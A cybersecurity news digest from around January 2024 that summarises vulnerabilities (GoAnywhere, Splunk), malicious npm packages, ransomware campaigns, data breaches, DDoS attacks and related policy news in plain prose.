π What’s trending in cybersecurity today?
Fortra’s GoAnywhere, Malicious npm Packages, GitHub, SSH Keys, Kasseika Ransomware, BYOVD, Antivirus, Splunk, Windows, CISA, Industrial Control Systems, Veolia North America, CL0P Ransomware, S&A Law Offices, India, Jason’s Deli, Data Breach, Credential Stuffing, Coronalab.eu, Database Breach, Russia, Akado, DDoS, NCSC, Malicious AI, Israel, Czech Republic, Amazon, Employee Surveillance Breach, VexTrio, X, iOS Passkeys.
Listen to the full podcast
π¨Β Cyber Alerts
A significant security vulnerability in Fortra’s GoAnywhere Managed File Transfer (MFT) software poses a serious threat, allowing unauthorized users to create new administrator accounts. The flaw, tracked as CVE-2024-0204 with a CVSS score of 9.8, enables authentication bypass, allowing an attacker to create an admin user via the administration portal. Users are urged to upgrade to version 7.4.1 or apply temporary workarounds to mitigate the risk, as the flaw’s exploitation could lead to the creation of administrative users, posing potential security breaches.
Two harmful npm packages, warbeast2000 and kodiak2k, have been discovered on the npm package registry, using GitHub to store stolen Base64-encrypted SSH keys from developer systems. Published in January 2024, these modules were downloaded 412 and 1,281 times before being removed by npm maintainers. ReversingLabs, a software supply chain security firm, identified eight versions of warbeast2000 and over 30 versions of kodiak2k, both executing postinstall scripts to retrieve and execute JavaScript files, exposing a threat to software supply chain security.
Kasseika ransomware employs Bring Your Own Vulnerable Driver (BYOVD) tactics, exploiting the Martini driver to disable antivirus software before encrypting files. Trend Micro analysts, who first uncovered Kasseika, note its attack chains and source code similarities with BlackMatter, suggesting it was likely built by former members or actors who purchased BlackMatter’s code. The ransomware utilizes phishing emails, Martini driver vulnerabilities, and BYOVD attacks to gain access, terminate antivirus processes, and encrypt files, demanding a ransom with increasing amounts for delayed payment.
Splunk has resolved multiple vulnerabilities in Splunk Enterprise, with particular attention to a high-severity flaw affecting the Windows version (CVE-2024-23678, CVSS score 7.5). The identified vulnerability in Splunk Enterprise for Windows versions below 9.0.8 and 9.1.3 involves incorrect sanitization of path input data, leading to unsafe deserialization of untrusted data from a separate disk partition on the machine. This flaw could allow the execution of malicious code on the system, emphasizing the importance for users to upgrade to versions 9.0.8, 9.1.3, or higher to mitigate potential risks.
CISA has issued six advisories highlighting security concerns and vulnerabilities in Industrial Control Systems (ICS) as of January 23, 2024. These advisories cover various systems, including APsystems Energy Communication Unit (ECU-C) Power Control Software, Crestron AM-300, Voltronic Power ViewPower Pro, Westermo Lynx 206-F2G, Lantronix XPort, and Orthanc Osimis DICOM Web Viewer. The advisories aim to provide essential information about existing security issues, vulnerabilities, and potential exploits within ICS, urging users and administrators to review the details and apply necessary mitigations.
π₯ Cyber Incidents
Veolia North America, a subsidiary of Veolia, experienced a ransomware attack affecting its Municipal Water division and bill payment systems. Following the attack, Veolia took defensive measures, temporarily shutting down some systems. While back-end systems are now restored, customers faced delays in online bill payments, and the company is collaborating with law enforcement and forensics experts to assess the attack’s impact on operations and systems.
S&A Law Offices, a prominent legal firm in India, faces a cyberattack claimed by the CL0P ransomware group. Alleged compromises include sensitive employee information, raising concerns about client confidentiality and potential reputational damage. This incident adds to the growing cyber threats against Indian organizations, emphasizing the need for heightened cybersecurity measures in the face of an escalating risk landscape.
Jason’s Deli, a US restaurant chain, alerts customers of a data breach, revealing that personal data was exposed in credential stuffing attacks. The incident occurred on December 21, 2023, as hackers obtained credentials from other sources in a credential stuffing attack against the restaurant’s website. The data exposed includes names, addresses, phone numbers, birthdays, and more, impacting potentially 344,034 customers, with Jason’s Deli urging impacted users to reset passwords and take precautionary measures.
An unsecured database linked to Netherlands-based medical laboratory Coronalab.eu, owned by Microbe and Lab, was found exposed on the internet, potentially impacting 1.3 million records. The exposed database included COVID test results, personal identifiable information (P I I), and documents marked with Coronalab.eu’s name and logo. The records contained patient names, nationality, passport numbers, test results, and more. Security researcher Jeremiah Fowler discovered the trove, highlighting the need for healthcare entities to take responsibility for data security, especially when using third-party services like cloud computing.
Moscow’s primary internet provider, Akado Telecom, experienced its third outage since December, impacting government agencies, Putin’s administration, the FSO, and the FSB. The disruptions, attributed to Ukrainian hacktivist group IT Army of Ukraine, led to widespread outages affecting various government bodies and banking infrastructure. Akado Telecom, a major service provider for government entities and businesses, faced repeated DDoS attacks, causing extended internet outages, with Sberbank among the affected organizations. The attacks highlight the ongoing cyber tensions between Russia and Ukraine, impacting critical internet services in Moscow.
π’ Cyber News
The UK’s National Cyber Security Centre (NCSC) has issued a warning that the use of malicious AI is likely to lead to an increase in cyber-attacks, particularly ransomware, over the next two years. The NCSC’s threat assessment highlights the use of generative AI (GenAI) in cybercrime, with offerings being developed in the underground. While currently, only well-resourced threat actors deploy sophisticated AI-powered attacks, the accessibility of publicly available AI models is lowering the entry barrier for novice cybercriminals. The NCSC emphasizes the importance of securing AI systems and advises organizations to follow cybersecurity hygiene practices to enhance their resilience against evolving cyber threats.
The Israel National Cyber Directorate and the Czech Republic National Cyber and Information Security Agency have formalized their collaboration through a signed memorandum, solidifying cybersecurity relations between the two nations. Discussions between Gaby Portnoy and LukΓ‘Ε‘ Kintr covered current cyberspace threats, including those stemming from the Gaza conflict. The memorandum aims to foster closer cooperation, enabling the sharing of information and experience to address evolving cybersecurity challenges.
France’s data protection agency imposed a β¬32 million fine on Amazon’s French warehouses unit for an intrusive surveillance system monitoring staff performance. The system used scanners to track workers, alerting management to inactivity exceeding 10 minutes or rapid handling of packages. The fine, nearly unprecedented, reflects a breach of the EU’s data protection regulations, and Amazon, while rejecting the findings, faces the need to adjust its surveillance practices to comply with privacy standards.
The cybercrime ecosystem reveals increasing professionalization and specialization through VexTrio, identified as the largest provider of traffic brokering. Infoblox cybersecurity firm highlights the involvement of cybercrime groups like SocGholish and ClearFake with VexTrio. Acting as a malicious traffic broker, VexTrio employs traffic distribution systems, assessing victims based on various factors and routing them to malicious sites for affiliated groups. VexTrio’s six-year presence involves takeovers of legitimate domains, registration of thousands of malicious domains, and its role in redirecting victims to content like malware, ransomware, and scam pages.
X has introduced a new security feature, allowing iOS users in the United States to log into their accounts using passkeys. These passkeys, linked to the iOS device, offer robust protection against phishing attacks and unauthorized access attempts, significantly reducing the risk of breaches. By leveraging public key cryptography from the WebAuthentication standard, passkeys enhance user experience and security by eliminating the need for complex passwords, ensuring a secure and convenient login process for X users.